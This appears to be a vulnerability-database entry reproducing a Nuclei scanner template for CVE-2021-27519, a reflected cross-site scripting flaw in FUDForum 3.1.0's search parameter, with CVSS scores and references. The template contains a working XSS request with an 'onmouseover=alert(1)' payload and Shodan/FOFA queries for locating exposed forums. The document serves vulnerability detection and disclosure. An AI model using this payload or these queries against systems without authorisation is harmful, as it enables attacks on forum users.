Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-27519
HistoryMay 31, 2022 - 9:16 a.m.

FUDForum 3.1.0 - Cross-Site Scripting

2022-05-3109:16:01
ProjectDiscovery
github.com
2

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.003 Low

EPSS

Percentile

70.1%

FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter.
id: CVE-2021-27519

info:
  name: FUDForum 3.1.0 - Cross-Site Scripting
  author: kh4sh3i
  severity: medium
  description: |
    FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/49942
    - https://github.com/fudforum/FUDforum/issues/2
    - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27519
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-27519
    cwe-id: CWE-79
    epss-score: 0.00217
    epss-percentile: 0.59671
    cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fudforum
    product: fudforum
    shodan-query:
      - 'http.html:"Powered by: FUDforum"'
      - http.html:"fudforum"
      - 'http.html:"powered by: fudforum"'
    fofa-query:
      - 'body="powered by: fudforum"'
      - body="fudforum"
  tags: cve2021,cve,xss,fudforum,edb,packetstorm

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'highlightSearchTerms("x" onmouseover=alert(1) x="");'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a00463044022011114e55f427c5c0cb3f1d7c6103073c1213207ae385557c419f07609587a76702204ca46f5b36c70ef46dbf6f665b41bef0cc15c48017836e493a3ad4ed38a65f66:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.003 Low

EPSS

Percentile

70.1%